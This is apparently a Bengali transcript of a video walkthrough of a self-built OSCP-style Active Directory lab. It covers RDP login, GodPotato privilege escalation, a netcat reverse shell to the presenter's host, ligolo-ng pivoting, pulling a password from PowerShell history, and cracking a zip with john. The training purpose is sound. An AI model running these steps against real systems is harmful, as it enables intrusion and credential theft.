আসসালামু আলাইকুম। ওয়েলকাম অন দিস ভিডিও। আবারও চলে আসলাম নতুন একটা ভিডিও নিয়ে। আপনার সাথে আছে আমি রবিউল আলম। চলুন কথা না বলে শুরু করি। সো আজকে ভিডিও টপিকটা বেসিক্যালি হচ্ছে অ্যাক্টিভ ডিরেক্টরি এডি সেট মেশিন অ্যান্ড অ্যাক্টিভ ডিরেক্টরি এডি সেট মেশিনে যেরকম থাকে, সো এখানে বেসিক্যালি দুটো ওয়ার্ক সেশন অ্যান্ড একটা ডোমেন কন্ট্রোল থাকে, টোটাল তিনটা মেশিন থাকে। অ্যান্ড আমিও সিমিলারলি আমার একটা ডোমেন কন্ট্রোলার এখানে দেখতে পাচ্ছেন আপনি, একটা ডোমেন কন্ট্রোলার DC01 অ্যান্ড দুইটা ওয়ার্ক সেশন M01 M02। তো এগুলো আমি সেট আপ করে নিয়েছি লোকালি। অ্যান্ড আমার লোকাল ল্যাপটপের কনফিগারেশন খুব একটা ভালো না, সো যাদের লো কনফিগারেশন ল্যাপটপ আছে তারা আই হোপ সো ইউজ করতে পারবেন। অ্যান্ড চলেন কথা না বলে শুরু করি। তো শুরু করতে করতে আহ, বলে রাখা ভালো যে ওএসসিপি তে যে এডিসেটের মেশিন আছে সেটাতে হচ্ছে আপনার একটা মেশিন, মানে একটা ওয়ার্কস্টেশন আর কি, আপনার হচ্ছে আপনার যে ইনিশিয়াল যে নেটওয়ার্ক থাকে ওইটা থেকে হচ্ছে ডিচেবল হয়। বাকিগুলোর জন্য হচ্ছে আপনাকে পিভটিং করতে হয়, পিভটিং করে দেন হচ্ছে আপনাকে ওইটাতে অ্যাক্সেস নিতে হবে। সিমিলারলি আমিও হচ্ছে এখানে সেম ভাবে সেট আপ করে নিছি। আমার হচ্ছে ফার্স্ট অফ অল একটা ওয়ার্কস্টেশন আইপি আমাকে দেওয়া দেওয়া আছে, এখানে দিচ্ছেন 10.6 এন্ড একটা ক্রিডেনশিয়াল আমার দেওয়া আছে। সো ক্রিডেনশিয়াল সবসময় দেওয়া থাকে কিনা এটা আমি শিওর না, হয়তো অনেক সময় হতে পারে আপনাকে ক্রিডেনশিয়াল বের করে নিতে হইতাছে। কজ হচ্ছে ওএসসিবি মেশিন গুলো একটু ডাইনামিক হয়। ডাইনামিক বলতে এক এক সময় একই ধরনের মেশিন দেয়। তো ইটস বেস ডিপেন্ডস অন দ্যাট যে কখন আপনাকে কোনটা দিচ্ছে। চলেন কুইকটা এনএফ স্ক্যান করে ফেলি আমাদের ওয়ার্কস্টেশন ওয়ানে। এখানে দেখতে পাচ্ছেন আমরা কয়েকটা পোর্ট পাইছি, জাস্ট চারটা পোর্ট পাইছি। সেখানে হচ্ছে আরপিসি, এসএমডি এন্ড হচ্ছে আরডিপি। এন্ড আমরা যদি একটু সার্ভিস ব্যানার দেখি, ওকে। সো এখানে হচ্ছে আমাদের ডোমেন হচ্ছে ওএসসিপি ডট লোকাল, নেট বায়োস হচ্ছে ওএসসিপি এন্ড কম্পিউটার নেম অ্যাকচুয়ালি হচ্ছে এটা M01। তো চলেন তাহলে হচ্ছে আমরা আমাদের যে ক্রিডেনশিয়াল দেওয়া আছে, যেটা ক্রিডেনশিয়ালটা ভেরিফাই করি। hyphen u Adrian hyphen hyphen p পাসওয়ার্ড। সো পাসওয়ার্ডটা আমি সিঙ্গেল কোটেশন নিয়ে নিলাম, কারণ হচ্ছে এখানে সিম্বল আছে কিছু, এন্ড সিম্বলের জন্য অনেক সময় হচ্ছে কমান্ড লাইন এটা ব্রেক করে। সো দেখতে পাচ্ছেন আমাদের হচ্ছে পাসওয়ার্ডটা ভ্যালিড দেখাচ্ছে। এন্ড আমরা কোনো পন প্রিভিলেজ পাইনি এখানে। শেয়ারস, শেয়ারস বলতে শুধুমাত্র আইপিসি আছে, রিমোট আইপিসি। ইউজার্স, কোনো ইউজার রিটার্ন করা নাই, হইতে পারে যে আমাদের এখানে এলডিএপি অ্যাক্সেস যেটা এটা নাই। আর আইডি রুট সেম অ্যাজ হেয়ার, তেমন কিছু আসে নাই। And let's check on RDP and RPC. RDP, well, RDP তে আমাদের পন প্রিভিলেজ পেয়ে গেছি আমরা, তার মানে হচ্ছে আমরা RDP থ্রুতে এটা পন করতে পারবো, মানে লগ ইন করতে পারবো। তো চলেন লগ ইন করি RDP তে। xp RDP/e machine IP, username and the password not for average. এন্ড একটা ভালো জিনিস মনে পড়লো, সেটা হচ্ছে লাস্ট টাইম যখন আমার আমার যে লাস্ট ভিডিওটা ছিল, এটা হচ্ছে একটা পন মেশিনের ভিডিও ছিল, আমি ওটা অ্যাক্টিভ ডিরেক্টরি মেশিন ছিল, এন্ড যেটা হচ্ছে ফাইন্যান্সিয়াল সাইবার ডিলে ছিল। এন্ড ওইটাতে একজন হচ্ছে, আমি এমন বলবো না, একজন হচ্ছে সাপোর্ট করিতে আমাকে লাইক সাপোর্ট করছে। সো থ্যাংক ইউ ফর দ্যাট, থ্যাংক ইউ ফর দিস সাপোর্ট, আই অ্যাপ্রিসিয়েট দিস।
ওকে, আমরা হচ্ছে অ্যাডমিন হিসেবে লগ ইন করে গেছি। এখন হচ্ছে আমরা ট্রাই করবো এখান থেকে একটা পাওয়ার শেল স্পন করার জন্য। এন্ড পাওয়ার শেল অ্যাজ অ্যাডমিনিস্ট্রেটর নিব, এন্ড এখানে হচ্ছে অ্যাডমিনের পাসওয়ার্ড চাবে, তো অ্যাডমিনের পাসওয়ার্ডটা আমরা এখানে দিয়ে দিব। ওকে, লেটস zoom in full screen, zoom, who am I, oscp/adrian, 9 slash priv, এন্ড প্রিভিলেজ চেক করলে আমি দেখতে পারতেছি এখানে হচ্ছে প্রিভিলেজ হচ্ছে সরি এই যে সেট ইম্পারসোনেট প্রিভিলেজ, এন্ড এটা বেসিক্যালি হচ্ছে ইম্পারসোনেট এ ক্লায়েন্ট আফটার অথেন্টিকেশন। সো অথেন্টিকেশন হওয়ার পরে আমি একটা ক্লায়েন্টকে ইম্পারসোনেট করতে পারবো। এন্ড পাশাপাশি হচ্ছে এখানে আমি আরো ইয়া করব, লাইক এটা আমার একটা শিওর শট বলতে পারেন, যেটা এটা ইনেবল আছে, এটা একটা শিওর শট। পাশাপাশি হচ্ছে আমি ট্রাই করবো এখানে উইন পিস রান করার, আর কোনো কিছু আছে কিনা দেখার জন্য। তো আমি একটা ডেমো ডিরেক্টরি বানিয়ে নিব, টেম্পোরারি, এন্ড এখান থেকে আমি সবকিছু আপলোড করব। সো আমি এখানে একটা পাইথন সার্ভার বানিয়ে নিব। সো আমার উইন পিস এখানে আছে, এন্ড আমার এই মেশিনের আইপি হচ্ছে 10.8। পোর্ট 80 তে আমি সার্ভারটা অন করলাম। এখন হচ্ছে আমি এটা এখানে ডাউনলোড করবো। এর জন্য IWR open URI 10.192.168.10.8 slash, and আমি জাস্ট উইন পিসটা এখানে পেস্ট করে দিব to avoid typing mistakes. Out 5 win piece. And আমি একটা কাজ করতে পারি, সেটা হচ্ছে এখান থেকে হচ্ছে আমি আরডিপি তে ডাইনামিক রেজলিউশন এড করে দিই, তাহলে হচ্ছে আমি আরডিপি টা ফুল স্ক্রিন করতে পারবো। উম, আর- আচ্ছা ওয়েট, হেল্প, হেল্পস ইলাস্ট্রেশন মার্ক, এখান থেকে ডাইনামিক রেজলিউশন। এখন আমি এটা ফুল স্ক্রিন করতে পারতেছি, এন্ড ডাইনামিক রেজলিউশন এটা হয়ে গেছে, এটা ডাউনলোড সরি মানে এটার পরে উইনপিস হয়ে গেছে। সো উইনপিসটা আমরা রান করবো এখন। উইনপিস, তো এটা কিছুক্ষণ টাইম নিবে, সো এই টাইমটা আমরা একটু ওয়েট করব। এন্ড এক কাজ করি, ইন দ্য মেন টাইম আমি হচ্ছে আরেকটা পাওয়ার শেল নেই। নট ফর অ্যাভারেজ,
এন্ড আরেকটা পার্সেল হয়ে গেছে আমার। এন্ড আমি যে আমার শিওর শটটা পাইছিলাম, তো আমি আমার শিওর শটটা এখন ট্রাই করবো। IWR 192.168.10.8 স্ল্যাশ, এন্ড আমি এটার জন্য ইউজ করবো হচ্ছে গোট পটাটো। গোট পটাটো বাইনারি এটা ইউজ করবেন এটার জন্য। আমার ফাইল গোট পটাটো ডান। নাও গোট পটাটো cmd slash c and I. ওকে, সো হুএমআই রান করলাম, হুএমআই রান করার পর এটা রান হয়ে গেছে। এন্ড দেখতে পারতেছেন আমরা কিন্তু সিস্টেম অ্যাকাউন্টে অ্যাক্সেস পেয়ে গেছি। এনটি অথরিটি, যেটা অ্যাকচুয়ালি মেশিন অ্যাকাউন্ট, সিস্টেম অ্যাকাউন্ট, সিস্টেম অ্যাকাউন্ট আমরা অ্যাক্সেস পেয়ে গেছি। দ্যাটস মিন উই হ্যাভ দ্য ফুল প্রিভিলেজ। এখন আমরা ট্রাই করতে পারি এখান থেকে রিভার্সাল কানেকশন নেওয়ার, যাতে হচ্ছে আমরা অ্যাডমিনের অ্যাকাউন্টটা ঘুরে ঘুরে দেখতে পারি। সো এটার জন্য আমি ইউজ করব নেটক্যাট। mc64.exe mc64.exe। ওকে, এটা রান হয়ে গেছে। এখন হচ্ছে আমি এটা থ্রুতে শেল স্পন করাইবো। স্ল্যাশ স্ল্যাশ এমসি ডট ইএক্সি, এখানে অবশ্যই ফুল পাথ দিতে হবে। ফুল পাথ না দিলে হচ্ছে গোটপাটা হচ্ছে আপনার বাইনারি খুঁজে পাবে না। এন্ড হাইফেন এখান থেকে আমরা একটা সিএমডি নিব, সিএমডি কানেকশন। এন্ড কানেকশন নিব হচ্ছে 192.168.10.8 এন্ড পোর্ট 1337। তো আমরা একটা লিসেনার নিব, LNP 1337। ডান। এবার হচ্ছে এখানে আমরা ব্যাক করে হার্ডলি এন্টার প্রেস করব। তো এন্টার করে প্রেস করার পর দেখেন প্রসেস স্টার্ট হয়ে গেছে। এন্ড আমরা যদি এখানে আবার ব্যাক চাই, হু এম আই অথরিটি অ্যাডমিন, উই আর নাও অ্যাডমিনিস্ট্রেটর। এখন হচ্ছে আমাদের ফার্স্ট ফ্ল্যাগ যেটা আছে, ফার্স্ট ফ্ল্যাগ আমরা পড়তে হবে। সো ফার্স্ট ফ্ল্যাগ বেসিক্যালি হচ্ছে ডেস্কটপে থাকে। টাইপ ইউজার্স অ্যাডমিনিস্ট্রেটর ডেস্কটপ proof.txt। ওকে, সো proof.txt টাইপ করার পর দেখেন আমরা কিন্তু পেয়ে গেছি ওয়েলকাম অ্যাডমিন m01। তো আমরা কিন্তু আমাদের ফার্স্ট ফ্ল্যাগ পেয়ে গেছি। এখন হচ্ছে আমরা সরি, এবার যদি হচ্ছে আমাদের আমরা যদি হচ্ছে উইনপিসে ফিরে যাই, এটা মিনিমাইজ করে দিই। সো উইনপিসে অনেক কিছুই আসছে। এক কাজ করবো, আমরা আমরা হচ্ছে উইনপিসটা আবার রান করবো অ্যাডমিনিস্ট্রেটর প্রিভিলেজ যেহেতু আমাদের কাছে আছে। সো অ্যাডমিনিস্ট্রেটর প্রিভিলেজ দিকে আবার রান করবো, যেখানে কোনো কিছু আছে কিনা। এমন হয় অনেক টাইম হচ্ছে অনেক ফাইলে ক্রেডেনশিয়াল থাকে, বা অনেক সিএমডি লাইন হিস্ট্রি থাকে। ওই সিএমডি লাইন হিস্ট্রি গুলো বেসিক্যালি হচ্ছে উইনপিস এর মাধ্যমে চলে আসে। সো দ্যাটস এ গুড ক্যাচ। winpiece.exe। ওকে, না, একটু হোল্ড করবো, আমরা একটু হোল্ড করলে হচ্ছে আমাদের এখানে চলে আসবে সব। একটু টাইম নিয়ে জাস্ট এটা।
অ্যান্ড এটা চলতে থাকে ততক্ষণ হচ্ছে আমরা আরেকটা কাজ করেছি, সেটা হচ্ছে যেহেতু আমাদের হচ্ছে অ্যাক্টিভিটিস সরি ওএসসিবি এডি সিস্টেমটা হচ্ছে যে আমাদের হচ্ছে ইনিশিয়াল অ্যাক্সেসের পরে, তারপর মানে আই মিন ফার্স্ট মেশিনে পরে, তারপরে মেশিনগুলোর জন্য আমাদের হচ্ছে পিভটিং করতে হয়। তো আমরা হচ্ছে আইপি কনফিগ দেখি, তো আমাদের নেক্সট আইপি সিরিজটা হচ্ছে 10.10.1.201। তো আমি যদি এখান থেকে আমার লিনাক্স আবার ব্যাক করে যদি আমাকে দেখাই আপনাকে, তো আইপিএ যদি দেখায়, তো আমার হচ্ছে এখানে একটাই আছে ইথারনেট জিরো, এন্ড ইথারনেট জিরো হচ্ছে 192.168.10.8। তো আমাদের কিন্তু 10.10 সিরিজটা কিন্তু এটা কিন্তু নাই। তো এটার জন্য হচ্ছে আমাদেরকে প্রক্সি চেঞ্জ সেট আপ করতে হবে, সরি প্রক্সি চেঞ্জ না, পিভটিং করতে হবে। এন্ড পিভটিং এর জন্য হচ্ছে আমরা ইউজ করবো লিগুলো ইংজি। সো স্টার্ট প্রক্সি সরি প্রক্সি আইপানি সেলফ। তো আমি এখানে প্রক্সি স্টার্ট করতেছি। আমি এটা হচ্ছে লিগুলোর প্রক্সি বাইনারি, এন্ড আপনার হচ্ছে এজেন্ট বাইনারি যেটা ওইটা দরকার হবে। সো এজেন্ট বাইনারিটা বেসিক্যালি হচ্ছে আমরা আমাদের ইয়াতে সার্ভারে আপলোড করব, টার্গেট সার্ভারে আপলোড করব, আই মিন টার্গেট মেশিনে আপলোড করব। ইয়েস ইয়েস ডান। আমাদের এইচটিটিপি কি রানিং আছে? ইয়েস এইচটিটিপি রানিং। ডাব্লিউআর ইউআরআই 192.168.0.10.3 স্ল্যাশ agent.exe out file agent.exe। এন্ড পাশাপাশি আমরা হচ্ছে একটা কাজ করবো, পোর্ট স্ক্যান এর জন্য হচ্ছে আমরা এফ স্ক্যানটা ইউজ করবো। এফ স্ক্যান এটা হচ্ছে স্ট্যান্ড অ্যালোন বাইনারি, পোর্টেবল বাইনারি। সো এটার মাধ্যমে হচ্ছে আমরা পোর্ট স্ক্যানিং যেটা শুরু করতে পারবো। এন্ড পোর্ট স্ক্যানিংটা হচ্ছে আমি রান করবো হচ্ছে এই রিভার্সাল থেকে। কারণ হচ্ছে কি, যখন হচ্ছে আমি দেখাইলাম হচ্ছে রান করে দেখাইলাম, উইনপিসটা রান করে দেখাইলাম, তখন কিন্তু দেখলেন যে অনেক ভাঙা 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 কিছুটা আসতেছিল। ওইটা কিন্তু এখানে এই যে এখানে কিন্তু সুন্দরভাবে আসতেছে। তা আমি হচ্ছে সেম ইয়েটা করবো, ওইটা হচ্ছে এফ স্ক্যান হচ্ছে সেম এরকম ভাঙা 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 আসবে। তো ওইটা যেন সুন্দরভাবে আসে, এই জন্য হচ্ছে আমি এইটার মধ্যে রান করাবো, রিভার্সালটার মধ্যে রান করাবো লিনাক্স এর মধ্যে। তাহলে হচ্ছে ওইটা ভাঙা ভাঙা আসবে না, সুন্দরভাবে ওই সিনট্যাক্স গুলো সুন্দরভাবে প্রিন্ট হবে, কালার গুলা। তো এটা একটু টাইম নিবে, উইনপিসটা একটু টাইম দিয়ে আমরা উইনপিসটাকে শেষ হোক। অথবা আমরা হচ্ছে একটা শেলও নিতে পারি, একটা রিভার্সাল কানেকশন। আচ্ছা থাক, এটা হোক, ধাপে ধাপে করি। এন্ড এদিকে উপরে কি হয়েছে না হয়েছে এগুলো একটু চেক করতে থাকে তখন। বাই দ্য ওয়ে আমরা কিন্তু এখানে মেশিন ইউজ করতেছি হচ্ছে উইন্ডোজ 10 লেটেস্ট ভার্সন, এন্ড ডোমেন কন্ট্রোলার হচ্ছে সার্ভার 20 সরি সরি 2016।
2016টা আমরা ইউজ করতেছি এখানে। ওকে, এই যে এখানে আমরা একটা ইউজার নেম দেখতে পাচ্ছি, এসবিসি আইআইএস ইউজার। নেক্সট। এটা টাইম নিচ্ছে। গেটিং লিগড nonetheless, it might take some time. একটু ওয়েট করবো এটা ফিনিশ হওয়া পর্যন্ত। Taking much longer time. ওকে, আমরা এদিকে হচ্ছে ইয়েটা স্টার্ট করে দিই। পোস্ট টাইমটা এখানেই করি। ডট স্ল্যাশ স্ক্যান এখন এইচ 10.10.1.0/24, অথবা হচ্ছে আমরা আরেকটা সেল এস্টাবলিশ করি আমরা, তাহলে একটা ভালো ভিউ পাওয়া যাবে। আহ, এবার কি ওপেন হচ্ছে এরা। আমি বেসিক্যালি এখানে আসছি গুড প্রপার কমান্ডটা কপি করতে, cause আমি আবার লিখতে চাচ্ছি না, তাই না? হুম, এইটা
ওকে, আমি আরেকটা লিসেন এনে নিব। 137 and press enter hard. Then fscan.exe then h 10.10.1.0/24. ওকে, এটা দেখেন আইসিএমপি পিং, মানে পিং পিং করেছে, তিনটা লাইভ হোস্ট পাইছে, 201, 200 and 202। তো 201 যেটা আছে এটা বেসিক্যালি 201 যেটা আর কি, এটা বেসিক্যালি হচ্ছে আমাদের ফার্স্ট মেশিন যেটা আমরা অলরেডি ফোন করছি। অ্যান্ড 202 অ্যান্ড 202 যেটা এই মেশিনটা বাকি আছে। সো আমরা যদি এখানে খেয়াল করি, তো এই যে M01 এটা হচ্ছে 201, মানে 201 যেটা, এটা হচ্ছে M01, আর M02 এই যেটা 202। তো 202 তে কি কি পোর্ট আছে? 153, 139 এন্ড 445। তো এসএমডি, আরপিসি এগুলো অন আছে। আর পরেরটা যদি আমরা চেক করি, সেটা হচ্ছে তো 1s, ঠিক আছে, 200, 200 এ এলডিএফ, এলডিএফ, আরপিসি, আরপিসি, এসএমডি। তো দেখে মনে হচ্ছে 200 যেটা এটা আমাদের ডিসি। এই যে, হ্যাঁ, এই যে 200 যেটা এটা হচ্ছে আমাদের ডিসি 200, 10.10.1.200, এটা হচ্ছে ডিসি 01। So, আমরা হচ্ছে এনম্যাপের আমাদের সরি পোর্ট স্ক্যানিং এর রেজাল্ট যেটা, এটা আমাদের যেটা পাওয়া দরকার এটা আমরা পেয়ে গেছি। লেটস মুভ নেক্সট। এবার হচ্ছে আমরা আমাদের পিভটিংটা করব। তো পিভটিং এর জন্য আমি আর একটা সেল নেব। পিভটিং এর জন্য একটা সেল হইলেই হইলো, লাইক অ্যাডমিনিস্ট্রেটর হোক বা নর্মাল ইউজার হোক, সেল হইলেই হচ্ছে। চলেন সেল নেই আমরা, pd/m /agent attend connect 192.168.10.8 করেন, and বিগুলো পুট হচ্ছে 11601। ইগনোর, যেহেতু আমাদের এসএসএল নাই তো আমরা ইগনোর সার্ট করবো, যেহেতু আমরা সেল সার্ট দিয়ে শুরু করছি। তো এটা কানেকশন গেছে। এখন আমরা যদি এখানে চেক করি বিগুলোতে, ইয়েস, দেখেন আমাদের এইজন জয়েন করছে। তো আগে যে আমার একটা ভিডিও আছে ইউটিউব চ্যানেলে, তো লিগলো এনজি দিয়ে কিভাবে হচ্ছে পিভটিং করতে হয়, তো ওইটাও হচ্ছে একটা ওল্ড ভার্সনও ছিল, ওল্ডার ভার্সন। অ্যান্ড নিউজার ভার্সনে কিন্তু অনেক জোস ফিচার আসছে। লাইক ওল্ডার ভার্সন সব থেকে ম্যানুয়ালি সবকিছু কনফিগার করতে হতো, বাট নিউয়ার ভার্সনে লাইক ইটস ভেরি সিম্পল অ্যাজ ওয়ান কমান্ড, লাইক সেশনস। এটা আগেরটা করতে হতো, সেশন সিলেক্ট করতে হতো, এখন জাস্ট হচ্ছে আপনার ম্যানুয়ালি ইথারনেট ইয়া আপনার করে আপনি অটো রাউট করলে এটা অটোমেটিকলি হয়ে যাবে। অটো রাউট করবেন এন্ড দেন রাউট সিলেক্ট করবেন এন্ড জাস্ট এন্টার করবেন, দেন হচ্ছে ক্রিয়েট নিউ ইন্টারফেস। এন্ড এখানে আপনি চাইলে কোনো নাম দিতে পারেন, আমি র্যান্ডম দিয়ে গেছি, লেট এমটি এন্ড স্টার্ট টানেল, দ্যাটস অল। এখন যদি আমি হচ্ছে আইএফ কনফিগ দিই, তাহলে হচ্ছে দেখেন এখানে কিন্তু ইথারনেট জিরোতে আমার হচ্ছে এটা শুরু হয়ে গেছে। 10.10.1.201 যে আইপি সিরিজটা আছে, এই সিরিজটা কিন্তু সে ফরওয়ার্ডিং করতেছে। এখন যদি হচ্ছে আমি নতুন একটা শেল নেই, এটা বড় করি, পিং 10.10.1.200। সো 200 করলে আমি ফল ব্যাক পাচ্ছি, অ্যান্ড 202 করলে এটা থেকে আমি ফল ব্যাক পাচ্ছি। এবার হচ্ছে ফার্স্ট অফ অল আমি কি করবো, আমি হচ্ছে ন্যানো হোস্ট ফাইল এডিট করবো। আমি হোস্টে সেটা আমি সবকিছু পাই গেছি, নিচে হচ্ছে হোস্ট ফাইল দিব, সেটা হচ্ছে 10.10.1.200
1 dot 200 10 dot 10 dot 1 dot 201 10 dot 10 dot 1 dot 202 এটা হচ্ছে আমাদের ডিসি ডিসি হচ্ছে ওএসসিপি ডট দোকান হচ্ছে ওএসসিপি ডট লোকাল অ্যান্ড ডিসি 01 ডট ওএসসিপি ডট লোকাল এটা তো হচ্ছে m01 ডট ওএসসিপি ডট লোকাল এটা হচ্ছে m02 ডট ওএসসিপি ডট লোকাল ওকে উই আর অল সেট এখন হচ্ছে আমরা এটা হয়ে গেছে তো আবার হচ্ছে আমি উইনপির সাথে ফিরে যাবো যে উইনপিসে কি অবস্থা এটা এখনো স্টাক হয়ে আছে ওকে সো উইনপিসে বসে থাকা লাভ নেই লাইক আমি হচ্ছে ম্যানুয়ালি করি সেটা হচ্ছে আমাদের হচ্ছে অ্যাডমিনিস্ট্রেটরের ইয়া চেক করবো আমরা অ্যাডমিনিস্ট্রেটরের পাওয়ারশেল কমান্ড হিস্ট্রি চেক করবো স্ল্যাশ ইউজার্স অ্যাডমিনিস্ট্রেটর অ্যাপ ডাটা রোমিং রোমিং দেওয়ার পর হচ্ছে মাইক্রোসফট উইন্ডোজ পাওয়ারশেল ডে 3 অ্যান্ড পিএস রিডলাইন শিট আমি শিফট চাপতে ভুলে গেছি এটা না আমি হচ্ছে শেলটা আবার আপ করি দিস ইজ ওয়ান অফ দ্য রিজন আমি কেন ভিএম হেট করি এন্ড পাশাপাশি অনেক সময় হচ্ছে কিবোর্ড ল্যাগিং ইস্যু তো দেয় যেমন আপনি একটা টাইপ করবেন 4-5টা উঠে যাবে সো এটা খুবই পেইনফুল আর হচ্ছে এখানে ফিক্স র্যাম লাইক আপনি মেমোরি ডাটা ডাইনামিকলি ইউজ করতে পারবেন না এই জন্য হচ্ছে আমি ডাব্লিউএসএল ইউজ করি কারণ ডাব্লিউএসএল ডাইনামিকলি ইউজ করা যায় যখন আমার যতটুকু লাগবে সে অটোমেটিক যতটুকু নিবে নিয়ে এসে ইউজ করে ফুল পটেনশিয়াল পাওয়া যায় আপনার ইসের হোস্ট মেশিনের এখানে সিপিইউ লিমিটেড ওকে তো এই হচ্ছে আমার সিএমডি হিস্ট্রি এখন সিএমডি হিস্ট্রির মধ্যে সবার উপরে আছে ওই যে রান অ্যাজ রান করছিল এন্ড রানার দিয়ে হচ্ছে সিএমডি রান করছিল এন্ড এখানে ইউজার হচ্ছে নিকোল এন্ড পাসওয়ার্ড হচ্ছে রেডি ফর অল তো জাস্ট এটুকু কপি করবো আমি এন্ড আমি এই শেলটাকে এই ট্যাবটাকে হচ্ছে আমি টেম্পোরারি নোট হিসেবে ইউজ করবো তো এবার আমার কাজ কি এবার আমার কাজ হচ্ছে অতিরিক্ত ট্যাব গুলো কেটে ফেলা এটা দরকার নেই আমার আমি কেটে ফেলি যেহেতু আমরা অলরেডি করে ফেলছি ম্যানুয়ালি এন্ড এটারও দরকার নেই এটাও কেটে ফেলি এন্ড এখানে হচ্ছে শেল আছে এখান থেকে হচ্ছে পাসওয়ার্ডটা পাইছি যেহেতু আমরা পেয়ে গেছি পাসওয়ার্ড এটারও আমাদের দরকার নেই আর শেলের জাস্ট এটা সো এনএফসি ক্রিডেনশিয়ালটা প্রথমে আমরা ভ্যালিড করব যে এটা ক্রিডেনশিয়াল সেম আছে কিনা বা চেঞ্জ করছে কিনা ক্রিডেনশিয়ালে কোনো পাসওয়ার্ডে কোনো এসএনডি 10.10.1.200 ডিসি তে চেক করবো আমরা আপনারা হয়তো নোটিস করতেছেন না বাট আমি ফিল করতে পারতেছি স্টিল আমার হালকা হালকা কিবোর্ড গ্লিচ দেখা দিচ্ছে হালকা হালকা কিবোর্ড গ্লিচ হচ্ছে ওকে সো আমার এই নিকল যে ইউজারটা আছে এই নিকল ইউজারের হচ্ছে ডিসি তে কোনো প্রিভিলেজ নাই লাইক লগ ইন প্রিভিলেজ নাই সো আমি হচ্ছে ট্রাই করবো টু মেশিনটাতে ওকে টু মেশিনের জন্য হচ্ছে এই ক্রিডেনশিয়াল যেটা আছে এটা ভ্যালিড সেম জিনিসের জন্য দুইটা রেজাল্ট কেন আসলো লেটস ট্রাই अगेन
ওকে, একবার ভ্যালিড দেখাচ্ছে, একবার রং দেখাচ্ছে, আমি কাহিনী বুঝলাম না। ও আচ্ছা আচ্ছা, আমি এখানে ইউ দুইটা লিখছি, সরি মিস্টেক, মাই ব্যাড, দুইটা ইউ ছিল এখানে। ওকে, নাও ইটস ফাইন। সো আমাদের হচ্ছে এসএমবি তে লগইন প্রিভিলেজ নাই, আর এটাতে এসএমবি আরপিসি ছাড়া কিছু নাই। তো এসএমবি যেহেতু আছে, তো আমরা সেখানে এখানে শেয়ারস চেক করব। শেয়ারস আমরা একটা শেয়ার পাইছি, এটা হচ্ছে ব্যাকআপ শেয়ার। এন্ড দেন দেন ট্রাই করবো হচ্ছে ইউজার্স, নাথিং, আইডি, ইউথ, নাথিং। ওকে, সো আমরা শেয়ারটাতে যাবো একটু। এসএমবি ক্লায়েন্ট আইটেম ইউ ওএসটিপি স্ল্যাশ কো। ও সরি, আমি শেয়ার মেনশন করি না, কোন শেয়ারে যাবো আমরা সেটা মেনশন করি নাই। আর ইউটা ক্যাপিটাল হবে। ব্যাকআপস, ওকে সরি, পাসওয়ার্ড দিই না আমি। ওকে, লগ ইন করে ফেলছি অ্যান্ড হিয়ার ইজ ইমেজ ডট জিপ। জাস্ট এটাকে ডাউনলোড করবো। get image dot zip ডাউনলোড হয়ে গেছে। এখন এটাকে একটা একটা ফাইলে নেই, ডাউনলোডস ইমেজেস ফোল্ডার নিলাম। জিপ ইমেজেস ডট জিপ। ওকে, এখানে পাসওয়ার্ড চাচ্ছে, সো আমাদেরকে পাসওয়ার্ড ক্রিয়েট করতে হবে জিপে প্রথমে। এটার জন্য ইউজ করবো জিপ টু জন ইমেজেস জিপ ডট টিএক্সটি, জন জিপ ডট টিএক্সটি। লাইক এটা ডিফল্ট ওয়ার্ড লিস্ট যেটা আছে, এই যে আপনি যদি কোনো ওয়ার্ড লিস্ট সিলেক্ট করে না দেন জনের জন্য, তাহলে সে হচ্ছে ডিফল্ট যে ওয়ার্ড লিস্ট যেটা আছে, এই যে স্ল্যাশ ইউজার স্ল্যাশ শেয়ার স্ল্যাশ জন স্ল্যাশ পাসওয়ার্ড ডট লিস্ট, এটার থেকে সে হচ্ছে টেকনিক শুরু করবে। এন্ড আমরা পেয়ে গেছি হ্যালো কিটি পাসওয়ার্ড। এন্ড হ্যালো কিটি পাসওয়ার্ড দেওয়ার পরে এটা আনজিপ হয়ে গেছে। লেটস চেক দিস ইমেজেস, ওপেন ফোল্ডার, and here are our images, and images are a pretty decent image, visual view পুরো decent। সো এখানে কিছু নাই, তো আমরা হচ্ছে এক্সিকিউট চেক করব। এক্সিকিউট স্টপ ফটো, এই দেখেন ক্রিয়েটরের মধ্যে হচ্ছে একটা সার্ভিস অ্যাকাউন্টের নাম আছে এখানে, এসবিসি আইএস। তো আমি যদি হচ্ছে সবগুলা চেক করি, ফটো ক্রিয়েটর, সরি ক্রিয়েটরের সিটা বড় হাতের হবে। আচ্ছা ভাবছি আমি এখানে আইটেম আই মেনশন করে দিই। সো দেখেন এই যে ইউজার চলে আসছে কয়েকটা, ইনিট, এসবিসি আইআইএস, লুসি, মার্লিন, নিকল। তো লেটস লেটস নোট দেম all is on top, NH, SBC IIS, Lucy, Merlin, and Nicole। সেট করবো এটা আমরা ইউজার জাস্ট পিএইচপি নামে। আরে সেভ বাটন দেখাচ্ছে না, এটা ফুল স্ক্রিন করতে হবে।
সেভ। ওকে, আমি এখান থেকে পোস্টিং করে নিই, তাহলে আরো বেটার হয়। আমি এটা পোস্টিং করতে ভুলে গেছিলাম। এটা সেভ হয়ে গেছে। এখন যদি আমি ক্র্যাক করি, তো দেখেন আমার হচ্ছে এখানে 6টা ইউজারই পেয়ে গেছি আমি। তো এবার ট্রাই করবো কি, এবার ট্রাই করবো হচ্ছে যেহেতু আমার ইউজার নেম আছে, তো ইউজার গুলো আছে, আর হচ্ছে আমার আহ একটা ক্রিডেনশিয়াল, একটা একটা লাস্ট একটা অ্যাকাউন্টে ক্রিডেনশিয়াল পাইছি, যেটা হচ্ছে নিকোল। এখন হচ্ছে নিকোল ইউজ যদি ট্রাই করবো এখান থেকে কোনো কিছু বের করতে পারি কিনা। বাট আমাদের হচ্ছে আহ মেশিন অ্যাকাউন্ট যেটা আছে, মেশিন অ্যাকাউন্ট আর কোনো কিছু নাই। আর আমার হচ্ছে যে অ্যাকাউন্টটা ছিল, ডিসি অ্যাকাউন্টটা ছিল, ডিসি অ্যাকাউন্টটা হচ্ছে নিকোলের কোনো পারমিশন ছিল না, মানে লগ ইন পারমিশন এসএমপি তে ছিল না। তো আমি এখন কি করবো, আমি হচ্ছে ট্রাই করবো হচ্ছে কারবার আসলে পে অথেন্টিকেশন ডিজেবল কোনো ইউজার আছে কিনা, সেটা দেখার জন্য। সেটাতে দেখবো হচ্ছে আমি ইনপ্যাকেট গেট এমপি ইউজার নামের থেকে মডিউল স্ক্রিপ্ট আছে, সেটাতে আমি ট্রাই করবো। 